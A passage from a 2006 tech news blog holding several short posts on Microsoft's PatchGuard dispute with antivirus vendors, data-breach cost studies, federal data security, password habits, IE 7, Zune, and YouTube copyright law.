How much of this is real and how much is gamesmanship? It's hard to say. McAfee and Symantec are clearly protecting their turf, especially in the consumer space, and appear to be building a case for some kind of antitrust action over the security features in Vista. On the other hand, it's entirely possible that Microsoft is presenting two faces to the antivirus vendors: one to small enterprise-focused vendors like Sophos and Trend, who don't pose a threat to OneCare and Microsoft's other products, and another to Symantec and McAfee who do.
It's impossible to know, for sure, whether the antivirus vendors are crying wolf, or whether Microsoft is truly acting vulpine as it ramps up its security products. Once the lawsuits start flying, we may learn more.
Posted by Paul Roberts on October 23, 2006 07:05 AM
October 20, 2006 | Comments: (0)
Study: Data-breach costs on the rise
Data breaches are on the rise in the business world. According to the Privacy Rights Clearinghouse, more than 330 data loss incidents involving more than 93 million individual records have occurred since February 2005.
As these incidents increase in number, so too do the associated expenses that companies end up paying for their negligence.
Data breaches have cost companies an average total of $4.7 million, or $182 per compromised record, in 2006, according to the "2006 Cost of Data Breach Study" from Ponemon Institute. That's up from $138 per record last year.
Among the 31 companies that participated in the study, all of which suffered data security breaches, total costs per incident ranged from under $226,000 to over $22 million.
"The burden companies must bear as a result of a data breach are significant, making a strong case for more strategic investments in preventative measures such as encryption and data loss prevention," said Dr. Larry Ponemon, chairman and founder of The Ponemon Institute, in a written statement. "Tough laws and intense public scrutiny mean the consequences of poor security are steep - and growing steeper for companies entrusted with managing stores of consumer data."
The report, slated for release on Monday, Sept. 23 at Infosecurity NY 2006, was co-sponsored by PGP, an enterprise data security and encryption provider, and Vontu, the data-loss prevention solutions vendor. (Notice a common thread between Ponemon's recommendation and the companies sponsoring the report? Still, I wouldn't discount these findings outright.)
About 70% of the costs per incident were "indirect," stemming from loss of existing and future customers, according to the report. Not surprisingly, people don't want to stick around after you've made them a target for identity theft.
The report breaks down the direct costs by various activities. Detection, discovery and escalation expenses, i.e. "activities necessary to discover and report the breach to appropriate personnel in a specified time period", averaged $295,475.
Notification costs, referring to the process of alerting "data subjects with a letter, outbound telephone call, e-mail or general notice," averaged $662,269.
Ex-post responses, the process of helping victims with information, recommendations, credit-report monitoring, or reissuing a new account or credit card, cost an average of $1,245,845.
What was to blame for these breaches?
- Fourteen of them (45%) were a result of lost or stolen laptops, desktops, PDAs, or thumb drives.
- In nine cases (29%), the cause was lost or stolen files acquired or used by a third party.
- In eight cases (26%), lost or stolen electronic backups (e.g. magnetic tapes) led to the data spill.
- In four (13%) cases, the cause was lost or stolen paper records or files.
- Three cases (10%) involved hacked electronic systems.
- Malicious insiders were behind two cases (6%).
- Malware was the culprit in two cases (6%).
- In one case (3%), a misplaced network or enterprise storage device (due to a natural disaster) led to the breach.
Participants were also asked what preventive measures they implemented after the breach. Their responses:
- Thirteen (42%) have added additional manual procedures or controls.
- Nine (29%) have implemented training and awareness programs.
- Seven (23%) are encrypting data in motion.
- Five (16%) are encrypting data at rest.
- Four (13%) have installed information leak detection and prevention systems.
- Three (10%) have deployed security event management systems.
- Another three (10%) have put up additional perimeter controls.
- Two (6%) have launched identity and access management systems.
- Another two have conducted independent security audits.
- Two companies have done nothing.
- One company has started encrypting data backups.
Copies of the "2006 Cost of a Data Breach Study" are available through PGP, Vontu, and The Ponemon Institute.
What do you find most striking about this study's findings -- if anything?
Posted by Ted Samson on October 20, 2006 05:52 PM
October 20, 2006 | Comments: (0)
A turkey: Canada gets Vista 1st, eh?
It's official: Microsoft is going with the Canada-first strategy. Eagle-eyed Microsoft observers cruising the Canadian Microsoft Developer Network site on Friday spotted the announcement that Vista, Office 2007 and Exchange Server 2007 will be introduced at an Edmonton launch event on Nov. 23.
That's Thanksgiving in the US, but not in the Great White North, which gives thanks the second Monday in October. So assuming the site has it right, Microsoft is slipping into the continent from the north, giving Canada a first official look, even as most Americans are nursing themselves out of a Tryptophan coma. Smart money, then, is that the US launch will follow hot on the heels of Canada, probably the next Monday, Nov. 27.
This is all speculation, since MS has been coy about coughing up a US launch date. Still, Redmond has been touting a November introduction Stateside, and the Canada launch indicates the pieces are indeed ready. Of course, you won't be able to actually get the disks until January or so, as MS stuffs the channel with product.
But a launch is a launch. Even if it is on Turkey Day.
Posted by Steve Fox on October 20, 2006 05:20 PM
October 20, 2006 | Comments: (0)
Fed gets D+ for weak data security
If the federal government was a college student, it would be on academic probation right now for a near-failing grade in Data Security 101.
In a report released last Friday, the Government Reform Committee slapped the feds with a pathetic D+ for its appalling track-record in adequately protecting U.S. citizens' personal data since 2003.
All 19 federal departments have suffered at least one data breach since 2003, according to the committee's report, which goes into quite some detail about the number of data breaches suffered by each department, including specific dates and incidences. (You can download the report here.)
According to the report, the Dept. of Veteran Affairs reported the most "incidents involving the loss or compromise of any sensitive personal data." The report didn't offer a specific number, just "hundreds." Next was the Dept. of Treasury, with 340 incidents. Third was the Dept. of Commerce with 297. The Dept. of Defense reported 43; the Dept. of Education, 41; and the Dept. of Health and Human Services, 24. The remaining departments each reported fewer than 10.
Perhaps even more troubling: It's possible that your information was swiped from a government database, and you don't even know it. According to the report, "agency responses to data losses appear to vary ... with some notifying all potentially affected individuals, and others not performing such notifications."
The thing is, they're not required to let you know if some malicious hacker makes off with your name, address, and Social Security number: "Despite the volume of sensitive information held by agencies, there is no requirement that the public be notified if their sensitive personal information is compromised," the report says.
Among the committee's overall findings:
- Agencies do not always know what has been lost. "In many cases, agencies do not know what information has been lost or how many individuals could be impacted by a particular data loss. Similarly, agencies do not appear to be tracking all possible losses of personal information, making it likely that their reports to the committee are incomplete."
- Physical security of data is essential. "Only a small number of the data breaches reported to the Committee were caused by hackers breaking into computer systems online. The vast majority of data losses arose from physical thefts of portable computers, drives, and disks, or unauthorized use of data by employees."
- Contractors are responsible for many of the reported breaches. "Federal agencies rely heavily on private sector contractors for information technology management services. Thus, many of the reported data breaches were the responsibility of contractors."
Conspicuously absent from the 15-page report, however: a single recommendation of how to deal with the problem. In other words, the committee does a great job describing just how hot the fire is in the burning house, what might have caused it, and how many residents are trapped inside. But apparently someone else will need to come up with ideas on how to put it out. Ah, government inaction.
Of course, data breaches don't just affect the government. Businesses -- and as a result, their customers and employees -- continue to fall victim to data theft. Yet aside from offering a year of free credit monitoring, companies appear to be moving at a glacial pace to address the problem.
Trouble is, until we see some compliance legislation forcing companies to better protect users' private data, there's no real incentive for them to invest the time and money toward, perhaps, exploring encryption technology, improving security measures to limit what kind of data employees can carry around, and keeping a better tab on how partners are handling your sensitive data.
But there's really no excuse for the government not to get its act together, and to do it now. If the data of citizens, including veterans, is so easily accessible, who knows what other information malicious hackers and thieves might have access to. Securing our nation isn't just limited to having well-trained soldiers on the border, state-of-the-art jets in the sky, and satellites in space keeping tabs on enemies; not in the Internet Age.
Unfortunately, this hasn't become an election-year issue, so it's not garnering the attention it deserves from the powers-that-be. I recommend taking a moment to send a letter to your local reps, citing this report and telling them to do something about it now.
Or am I overreacting? Is the government doing enough to keep our data safe? What's the answer here? There's an interesting discussion group going on right now in InfoWorld's IT Exec-Connect community where this topic could be expanded on further.
Posted by Ted Samson on October 20, 2006 01:44 PM
October 20, 2006 | Comments: (0)
On Wednesday night, October 18th, the night Microsoft released IE 7, they invited a bunch of reporters and numerous, supposedly independent, A-list bloggers for an informal gathering to meet the IE 7 development team.
While I am skeptical by nature, and the evening did nothing to allay my natural inclinations, I did find a few of the conversations with the technocrats of the World Wide Web very enlightening.
First, why was I doubtful about getting honest opinions from the bloggers about IE 7?
Well, it was unclear whether all of the local blogger stars were invited or whether the only invitees were handpicked by Microsoft, knowing they were friendly to the cause.
I didn't get an answer to that, but I do know the responses to questions were all highly positive. One in particular stands out: when I asked one blogger how he would compare IE 7 to Firefox's about-to-be-released version, he responded, "I would rather compare 7 to IE 6, in which case the difference is phenomenal."
Give me a break.
Another blogger chimed in saying IE 7 is so good he may switch back.
There weren't many bloggers who showed up but at least two of the half dozen that were there in the first hour and a half of the evening were former Microsoft employees.
Nevertheless, my conversation with Tantek Celik, chief technologist and A-list blogger at Technorati was good.
Celik (properly spelled Çelik, with a cedilla under the C) is the creator of an XML framework called microformat.
Microformats offer a unique way to exchange and publish different types of information. They can take text and images in different formats and map them correctly inside a user's current application.
For example, a Web site might display a company's address, phone number, name of CEO, etc. If a microformat was used, with one click it could be placed inside Outlook contacts rather than having to cut and paste.
"If it is on one site you can syndicate it to another site," Celik added.
Two microformats are now available, HCal and Hcard.
On the topic of IE 7, Celik said that Microsoft has adhered much more closely to current browser standards, which means a developer writing for Firefox, Opera, or Safari would have very little to recode in order for it to run on IE 7.
He added that Microsoft has improved the browser engine and fixed a ton of bugs.
Another A-List blogger and Web site entrepreneur attending was Gabe Rivera. Rivera's Techmeme.com site is the place to go to keep abreast of tech news.
Rivera aggregates the best of the best blogs. But he also offers what he smilingly calls a "sponsored" site and that's how he makes money.
Using RSS, Techmeme takes blogs from sponsoring companies. The companies can control what blog gets on Techmeme simply by making the one they want to promote the most current on their own site.
Rivera was hot on IE 7, saying he liked the tab-based browsing and the lack of memory problems that were resident in IE 6. Rivera is the guy who may switch back.
However, he also likes a Mozilla Firefox addon called Flash Blocker saying it was terrific.
Dean Hachamovitch, general manager of the IE development team is championing the new addon site within IE 7.
Addons created for use in IE 7 are now organized in a single place with what Hachamovitch called a simple submission process.
At present there are 400 addons in the addons.com site.
With hundreds of millions of users, 400 addons seemed a bit paltry I said. His response was non-committal only explaining how useful the current group is.
I also spoke with Kristopher Tate, founder of Zooomr.com.
Tate's site aggregates photos and the site also deploys Celik's microformats for publishing pictures.
Microformats help Tate give users the ability to publish pictures in what he called a social network which puts the photo in contexts like time, place, and relationships.
Niall Kennedy told me what he likes about IE 7 is the improved Web handling and the addition of auto complete when typing.
Kennedy also likes the fact that RSS is built right into the platform so you can aggregate and subscribe to feeds and an icon lets you know when an RSS is available. There is also a Restore Session capability that brings you back to your Windows after a crash and shut down.
IE 7, said Kennedy, also supports spell check in Web mail.
Celik had the final word.
When asked why IE 7 is so important to Microsoft, since they don't make a dime on it, Celik said Windows is at stake and Microsoft makes a lot of money from that.
Windows is not the only OS in the market and it is up to Microsoft to prove it is the best. Since browsing is where most users live nowadays, as IE 7 goes so goes the franchise.
Posted by Ephraim Schwartz on October 20, 2006 01:14 PM
October 20, 2006 | Comments: (0)
Internet addiction is the latest "hot topic" in the social research crowd. Exhibit 1 is a new study out from the Stanford University School of Medicine that suggests there are similarities between Internet addiction and alcoholism, with 8 percent of the 2,500 people surveyed admitting they hid Internet use from family members. ("Hello, my name is Paul, and I'm an Internet addict.") So if you find a little WAP tucked into your spouse's closet, now you know why. ;-)
On a more personal note this week, there have also been duelling accounts of the salutary (or is it deleterious?) effects of World of Warcraft, the massively popular massive multiplayer online role-playing game (MPMMORPG) that counts none other than Bill Gates as a devotee.
First, on Tuesday, there was this soul baring from a "council member on one of the oldest guilds" in World of Warcraft's virtual world. This person, "Andy," has been playing the game for 30 hours a week for an entire year. At what cost? According to Andy, he put on about 30 pounds, lost most of his friends and generally withdrew from the "real world" in favor of his farming and guilding responsibilities in WoW. Typical of the post is a passage like this one:
"I remember clearly after fumbling around life for a few weeks that I dragged myself into the bathroom to get ready for work. I was tired because I was up until close to 2 AM raiding. Every week I read through email or I would run into one of my "real" friends and I'd hear "Andy, what's up, I haven't seen you in a while." I looked in the mirror and in a cinemaesque turn of events and a biblical moment of clarity, told myself "I haven't seen me in a while either"
But hey, at least this guy was single and unemployed...
"The worst though are the people you know have time commitments. People with families and significant others. I am not one to judge a person's situation, but when a father/husband plays a video game all night long, seven days a week, after getting home from work, very involved instances that soak up hours and require concentration, it makes me queasy that I encouraged that. Others include the kids you know aren't doing their homework and confide in you they are failing out of high school or college but don't want to miss their chance at loot, the long-term girl/boyfriend who is skipping out on a date (or their anniversary - I've seen it) to play (and in some cases flirt constantly), the professional taking yet another day off from work to farm mats or grind their reputations up with in-game factions to get "valuable" quest rewards, etc... I'm not one to tell people how to spend their time, but it gets ridiculous when you take a step back."
That post produced a whole lot of comment and "me too" stories, not to mention some backlash like:
"2 characters 2 years 60th & 49th level 8 hours a week at the most. Seriously, balance is easily achieved. If you do so, you don't have to get burnt out on it." (How many of us haven't heard that line from our boozing friends?)
A more thorough response, on the same blog, came from a fellow guild member in favor of WoW.
The main argument seems to be that in WoW you can: 1) meet cool people you wouldn't otherwise meet and make friends, 2) practice being a better human. No kidding. Consider the following passage from the "Pro" camp:
"I got a Masters degree in policy from one of the most difficult schools in the country while at the same time playing WoW and working a part time job. I would come home from a busy day and think about how to use what I learned to make the guild work better."
Or:
"I like being the very best player I can be; whether I'm playing a priest or a mage or a twink druid, you can bet that I'm crunching numbers and reading theory and strategy and trying to make every action or every cast more efficient."
To which I say, "Twink druid???"
Honestly, speaking as someone who enjoys PC gaming, but never bought into the whole WoW thing, just listening to these two dudes debate whether WoW is addictive and harmful at least convinces me how seductive and consuming the game must be. I mean, these guys are totally checked out!
How about this little gem from the Con camp:
"I miss at least one raid a week to go out with friends, go clubbing, or watch a movie with my family. I hardly ever farm. I usually play the auction-house for fifteen minutes before I go to bed at night. I actually gave up herbalism because I didn’t have time for it (and I wanted to DE the stuff my ex gave me when we broke up >.>). If I start feeling frustrated, that the demands of people in the game are getting too high, or that I don’t have anything else to do … I walk away. I go for a walk, pursue one of my other hobbies, or call a friend. Soon enough I’m happy to come back, because I enjoy it and because there are people in the game whom I love and who make it worthwhile for me to play."
Anyone who considers squeezing an hour or two of "reality" around his day job and a fantasy role-playing game moderation is off the reservation. IMHO.
Diagnosis: Dude, you're hooked!
Posted by Paul Roberts on October 20, 2006 11:56 AM
October 20, 2006 | Comments: (0)
Microsoft AV talks go 'Jerry Springer'
Microsoft's talks with the antivirus industry over ways to circumvent its PatchGuard kernel protection technology have turned from chilly to ugly faster than a pair of cheating lovers on Jerry Springer.
Microsoft proposed the talks last week, after agreeing to turn over APIs for suppressing Vista features like the Security Center management console and to discuss ways to help the companies get around kernel patch protections in 64-bit versions of Windows.
The company was under pressure from the European Commission, which had sent signals that it was worried Vista's security features would stifle innovation in the field.
Microsoft has long maintained that it would not allow patches to the 64 bit Windows kernel, saying that it was bad practice and that there was no way to do it without also providing an avenue for hackers to do the same. Symantec, McAfee and other vendors charge that kernel patching is vital to behavioral detection products and other next generation security tools.
By all accounts, the meeting, Thursday morning, got off to a rocky start. According to Microsoft Security guru Stephen Toulouse, the company "had a glitch where we sent out a messed up link. People joining using the link resulted in basically the first attempt at the meeting folding and we had to scramble to set it up again."
In the end, 20 ISVs were able to attend, though many representatives from Symantec were not able to join in, according to spokesman Cris Paden. Another meeting was scheduled for Thursday evening, and a follow-up meeting has been set for Monday, also according to Toulouse's blog.
Meeting or no meeting, it seems like AV vendors weren't in a mood to wait around for the talks to conclude before unloading on Microsoft. Suggestions were flying shortly after the technical gaffe that it was a deliberate attempt to shut Microsoft's harshest critics out of the discussions.
McAfee issued a public statement Thursday evening, attribted to Christopher Thomas of Lovells, McAfee's outside litigation counsel in Brussels, saying the company has "seen little indication that Microsoft intends to live up to the promises it made last week."
"We have been greatly disappointed by the lack of action by the company so far and Microsoft has not lived up, either in detail or in spirit, to the hollow assurances offered by their top management last week,” Thomas was quoted saying.
Microsoft shot back early Friday, with a statement attributed to Security Technology Unit Vice President Ben Fathi, noting specific dates and times on which Microosft had sent documentation and sample code for allowing third party companies to control Security Center alerts.
"On the longer-term issue of working with the industry to develop additional APIs and interfaces beyond what is available already today on x64bit with Kernel Patch Protection," Fathi said "These discussions are underway between our engineering teams and our third-party security partners about the functionality they are seeking, and how to prioritize this significant work in the months ahead."
Which brings us to the nub of the issue here -- despite news reports to the contrary last week, Microsoft never really gave ground on the PatchGuard issue and it doesn't look like they intend to now. Fathi, Toulouse and others are saying what Microsoft has always said: they'd work with ISVs to define the functionality they want and look for ways to extend the Vista kernel to accommodate them. Allowing runtime patching of the kernel, however, is a no-go. Moreover, designing and building the APIs that the security vendors are looking for will take time -- certainly more time than vendors have before Vista hits the street.
As Toulouse himself blogged, shortly after news broke of the "compromise" with AV players: "I want to be crystal clear on this: We have not changed the implementation of or our commitment to Kernel Patch Protection in Windows Vista for x64bit systems. It’s still there, it’s not going to be turned off or have blanket exceptions granted for it." Period. Now stand up so I can throw this chair at you!
To be honest, Microsoft's line on PatchGuard has always sounded believable to me. Runtime kernel patching is a "don't try this at home" type of activity, and allowing ISVs to do it would seem to open the 64 bit platform up to the kind of spy vs. spy games that AV companies play with rootkit authors on 32 bit platforms -- with predictable results.
Microsoft just received an important endorsement for that position from rootkit author and researcher Joanna Rutkowska, who wrote on her Invisible Things blog that PatchGuard shouldn't necessarily be thought of as a security feature, and won't stop some classes of malicious programs from subverting the kernel protections. What it will do is make it a lot easier to spot and block kernel level hooking, by assuring that legitimate programs are not using that technique. Therefore any program that is trying to hook the operating system kernel must be illegitimate.
Not that Rutkowska's opinions will make much difference. The fact that McAfee is already issuing statements through counsel in the EU is a sign of where this debate is going. Namely: direct to the antitrust officials in Brussels. There may have been no way around this, given how hard Symantec and McAfee have promised to fight to protect their markets. But Microsoft certainly didn't make life easier on itself by withholding any information -- APIs, documentation, whatever -- in a way that could be construed as anticompetitive.
Hold on to your hats, and watch the flying chairs -- this fight's going to be a doozy!
Posted by Paul Roberts on October 20, 2006 08:54 AM
October 19, 2006 | Comments: (0)
MS's 'hollow assurances' rile McAfee
updated | Intentionally or not, Microsoft's making life a bit difficult, and stressful, for third-party security software vendors.
Addressing concerns from companies such as McAfee and Symantec who assert that 64-bit Vista won't support their security wares, the Big Redmondian Machine today said that it would make necessary changes to the OS -- eventually, according to reports.
The non-committal timetable can't be too heartening to the desktop-security industry as Vista's release date draws ever closer.
In fact, McAfee today released the following statement: "Despite pledges, press conference and speeches by Microsoft, the community of independent security companies that consumers rely on for computer protection has seen little indication that Microsoft intends to live up to the promises it made last week," said Christopher Thomas, a partner at Lovells which is presently serving as McAfee's outside litigation counsel in Brussels.
"We have been greatly disappointed by the lack of action by the company so far and Microsoft has not lived up, either in detail or in spirit, to the hollow assurances offered by their top management last week," Thomas said.
The statement came out the same day Microsoft attempted to host an online briefing for security ISVs, the purpose of which was to respond to complaints from Symantec and McAfee about 64-bit Vista's protective PatchGuard kernel that keeps the OS from playing nicely with third-party malware-fighting arsenals. But some vendors who attempted to participate were inadvertently locked out, according to BetaNews -- including the aforementioned Symantec and McAfee. Microsoft took responsibility for the glitch, though, and the meeting was rescheduled.
Notably, Microsoft has handed over API code to security vendors, which would allow them to disable the Security Center management console that will ship with Vista. But that doesn't address the problems with PatchGuard.
"Although PatchGuard is not used by Vista when it is running in 32-bit mode, it will lock many types of software, including Symantec's, out of the kernel on 64-bit versions of the operating system. The security vendors wanted Microsoft to give them some way to access the 64-bit kernel, saying that this high-level access was required in order to activate critical security features," IDG News Service writes.
This turn of events is at least scoff-worthy to the average tech cynic and great fodder for a conspiracy theorist. What if Microsoft was intentionally dragging its feet here so as to give itself an advantage by forcing its suite to be the desktop security tool of "choice" for its own operating system? That would certainly negatively impact the bottom lines of third-party vendors. Not that Microsoft would engage in arguably monopolistic behavior, of course. What's with these conspiracy theorists? Still, Microsoft could see an advantage in all this.
Then again, these events may very well give organizations further reason to delay Vista deployment. Yes, Microsoft has made a number of grandiose promises about Vista's enhanced security, but given the company's shoddy security track record, some shops may want to put Vista on hold until they can install anti-malware offerings from a more trusted vendor.
And speaking of Microsoft security, a vulnerability has already been found in Internet Explorer 7, which was released yesterday.
I'm just sayin'.
What do you think? Is Microsoft playing fairly? Will you deploy Vista before the company fixes PatchGuard to work well with third-party security tools?
Posted by Ted Samson on October 19, 2006 03:41 PM
October 19, 2006 | Comments: (0)
Motorola: Metro Wi-Fi'll never happen
In writing my column about WiMAX that will be online next week I spoke with Juan Santiago, senior director of product management at Motorola.
We were talking about Wi-Fi versus WiMAX and I found one of his comments about Wi-Fi both interesting and enlightening.
Enlightening because, as so many in high tech do, they put down what was once touted as the next great technology in order to promote their own.
Santiago dismissed Metro Wi-Fi as an attempt, he as much as said it was a feeble attempt, to take Wi-Fi outdoors. According to Santiago, Metro Wi-Fi "hasn't happened."
Among Santiago's reasons: because it is unlicensed and free, there are too many devices out there creating too much interference to make it usable.
Secondly, it would be too costly to support and maintain outdoor Wi-Fi. Reason being, to get coverage similar to cellular requires too many access points because of Wi-Fi's short range.
"If the municipalities didn’t subsidize [Metro Wi-Fi] the business case falls apart."
Santiago went on to say that the only reason the business case works is there is a tit-for-tat with municipalities, in which they get free access to the infrastructure like the light posts.
I guess the word subsidized is an anathema to a commercial concern but not everything has to be commercial. Isn't garbage collection, fire protection and police subsidized by city government, too? Isn't that why we pay taxes?
I suggest if WiMAX is so much better why doesn't Motorola donate the infrastructure to a municipality and show us all how to do it right.
Posted by Ephraim Schwartz on October 19, 2006 03:20 PM
October 19, 2006 | Comments: (0)
U.S. universities should focus on cooler topics as they try to attract more students to the engineering profession, according to MIT President Charles Vest.
Vest said that focusing on nano-science and large systems offers "mind-boggling possibilities" and "daunting challenges," and will draw more students into the engineering field.
Vest made the comments during a lecture, "Educating Engineers for 2020 and Beyond," at MIT's Bartos Theater, in an address Oct. 12 as part of the Brunel Lecture Series on Complex Systems, which was hosted by the Engineering Systems Division at MIT.
Nano-scale projects at MIT like batteries constructed out of viruses and the study of large scale systems like transportation and the environment will keep MIT on the cutting edge, and draw more young students into the field, Vest said.
"As we think about the challenges ahead, it's important to remember that students are driven by passion, curiosity, engagement and dreams," Vest told a standing-room-only audience.
Vest also told the audience, in so many words, that engineering programs should do more to help their students get a life.
Too much focus on individual study and core engineering coursework doesn't prepare students for "an ever-evolving social, political and economic context," said Vest.
Engineering programs should focus more on group work, team projects, research and experimental learning, and less on lectures.
21st century engineers will need communication skills and an understanding of ethics and social responsibility, business organization, innovation and product development. So it's not a bad idea to take a few humanities courses while you're at it, Vest said.
A number of recent reports have warned that problems in the U.S. education system and a lack of investment in basic research are eroding the country's lead in engineering and the sciences.
Posted by Paul Roberts on October 19, 2006 01:09 PM
October 19, 2006 | Comments: (0)
We've heard the rumors: Software is on the way out, the industry is dying, yada, yada, yada. Well, hold the rumors. Deloitte just pumped out its 12th annual "2006 Technology Fast 500" list, a daunting compendium purporting to identify the fastest growing tech companies in North America. And -- surprise! -- just as in years past, the list is dominated by software vendors: 179 of 'em. Add the 60 entries listed under the rubric "Internet" (essentially software by another name) and the software industry might even seem robust. Sheer bulk aside, however, telecom looks like the place to be, with the greatest percentage revenue growth overall.
Still, you've got to take these kinds of self-serving surveys with a grain of salt … and maybe a pitcher of margaritas to boot. More than half of these companies are privately held, so there's limited visibility into their actual finances. Even if the top line for company X grew by 1000 percent, who's to say that their costs didn't go up even faster. More telling, the list is based on five-year revenue growth percentage. A large percentage of a small number is still a small number. Company no. 10, Antenna Software ("real-time mobility solutions"), grew revenue more than 16,000 percent, from $61,000 to $9,852,000. Sounds impressive, but that would be a rounding error for Google (no. 41). Nonetheless, Antenna will get to issue a press release, as will IT consultancy Vaptech ($5 million in revenues). That's got to be worth something.
There aren't all that many whizzy, collaborative Web 2.0 plays here, probably because companies have to have been around for five years and show revenue progress. Let's look back in a few years. But there are a boatload of on-demand software-as-a-service providers, which take advantage of Web 2.0-ish browser functionality. Even so, the software list is dominated by frumpy old apps, IT consulting services, and vertical offerings catering to health care and the like. Somehow I find that comforting.
Posted by Steve Fox on October 19, 2006 04:00 AM
October 18, 2006 | Comments: (0)
Study: 1 in 3 put passwords to paper
System admins might want to take a long, deep breath before reading the findings of a recent research report about end-user passwords from Nucleus Technology.
Ready?
According to the survey, more than one in three enterprise users write down their passwords. And it gets worse: "Of the third of users that write down their passwords, one third of those do it on paper, such as a sticky note. Even more dangerous are the other two thirds: They keep their passwords as a text file on their laptop PC or mobile device, where it could be easily lost or stolen."
Whether you require complex passwords or basic ones; whether you require users to change them weekly or never; whether you use single sign-on or users have multiple passwords, the risk remains the same: according to the study, that same one-third-plus will continue jotting them down.
A total of 325 users participated in the survey, by the way, which isn't an overwhelming number, but it's still enough to give you cause to revisit your organization's password policies and security measures.
"Companies that spend time and money creating password security strategies are largely wasting their time, because one in three employees are writing down passwords regardless of password policies," says David O'Connell, senior analyst at Nucleus Research. "It's like leaving the key under the mat or in the flower box. Companies looking to ensure security should look beyond passwords to other authentication strategies."
While educating users about password protection may help a bit, the study suggests that companies explore alternative means to traditional passwords. "Some companies look to biometrics to increase security," according to the study.
Nucleus Research is a global provider of IT advisory and research services. The study is available for free through the company's Web site.
How do you manage passwords at your company? Is biometrics the answer?
Posted by Ted Samson on October 18, 2006 11:17 PM
October 18, 2006 | Comments: (0)
MS' Zune no sweet tune in Hebrew
Microsoft's iPod killer, Zune, may sound like hip branding to some, but older Hebrew speakers will probably do a second take when they come across the players at Best Buy while shopping for Bar Mitzvah gifts.
The name for the device -- which will take on the Apple iPod when released later this year -- sounds like a vulgarity, specifically the "f" word, in Hebrew, IDG News' Jeremy Kirk reports.
Why do I say it may only offend older Hebrew speakers? Well, heard of fcuk, or French Connection? Microsoft may be going after just the same twist on the new cool in getting warm on the f-word with the youngins.
Kirk reports that the tech industry continually creates goofy product names, er Google, but the companies usually hire branding consultancies to extensively research product names, including translations in other languages.
Seems Redmond had a day off on brand name research, but Hebrew linguists are divided over Zune anyway. Tsila Ratner, the head of Hebrew courses in the Department of Hebrew and Jewish Studies at University College London, says Zune is an unsuitable name for a product. However, Haggit Inbar-Littas, a 30-year veteran Hebrew teacher with the London Jewish Cultural Center, says while the name is "ridiculous" and close to the bad word, it's unlikely to be mistaken.
Microsoft breaks the controversy down to pronunciation. "While we do acknowledge the similarity in pronunciation to Hebrew zi-yun, that is not the intended meaning of the name Zune," according to a Microsoft statement.
Too late? Is Zune dead in the water with this oversight? Talk back below.
Posted by Mike Barton on October 18, 2006 02:27 PM
October 18, 2006 | Comments: (0)
Expert talks 'GooTube', copyright
Everyone seems to be weighing in on whether legal problems stemming from copyright infringement will hobble YouTube and make Google's $1.65 billion buy a mistake.
To find out, I called top copyright infringement attorney Barry Cohen at Thorp Reed and Armstrong to see what he thought.
[Good thing he didn't charge by the hour because he kept me on the phone quite a while explaining the intricacies of copyright law.]
Cohen told me at the beginning of the conversation he believes there is no way Google would have made the buy before hiring legal experts on copyright to analyze what YouTube does.
Cohen says, "there is no doubt that there has been and will be copyright infringement" on YouTube and that technically it is illegal.
However, is YouTube, and soon Google, liable for the copyright infringement?
There are two parts to the answer to this question.
Part one, according to the Digital Millennium Copyright Act [DMCA] there is something called Safe Harbor.
Safe Harbor was put into the DMCA to protect ISPs. If, for example, Verio hosts a Web site that uses a copyrighted picture, is Verio liable? Under Safe Harbor they are not.
"They are excluded under the DMCA Safe Harbor provision."
YouTube is already making an effort to qualify under Safe Harbor by implementing what is required of the provision, having a Take Down system in place.
Upon receiving notice from say NBC, as in the case of YouTube's having a full Saturday Night Live skit called Lazy Sunday on its site, they had a system in place to take down the skit immediately.
However, the law also requires that the service provider, like YouTube, was not aware of it and that they did not receive a direct benefit attributable to this material.
Is a site getting revenue from showing the infringed material? That is the question that the courts would ask.
The second part of the answer to the question of whether or not YouTube and Google are liable for copyright infringement centers on what is called Fair Use.
Generally, under Fair Use you can refer to lyrics in say a Bruce Springsteen song if you are writing about Springsteen. Or you can show a short clip from 60 Minutes in history class. That is Fair Use, says Cohen.
In other words using it for criticism or comment.
However, at this point the only person who can decide if a piece of content falls under Fair Use is a judge.
"I could show a one minute clip of movie and a judge might say it is not fair use. It depends on the portion of the content you are taking it from, and context you are showing it in," said Cohen.
There are other challenges as well to copyright infringement. Say you are showing a ten minute video clip of a movie, while ten minutes qualifies under Fair Use, that clip might contain the full three minutes of a song. That would be clear infringement.
Finally, Cohen believes much of this will be settled by licensing agreements as YouTube already has with Universal. However, Cohen also warns that it is not safe to assume that just because it is helping a company's marketing effort to be on YouTube they might not litigate.
While the chances of YouTube suffering the fate of Napster are slim, it is possible, said Cohen.
Posted by Ephraim Schwartz on October 18, 2006 01:27 PM
October 18, 2006 | Comments: (0)

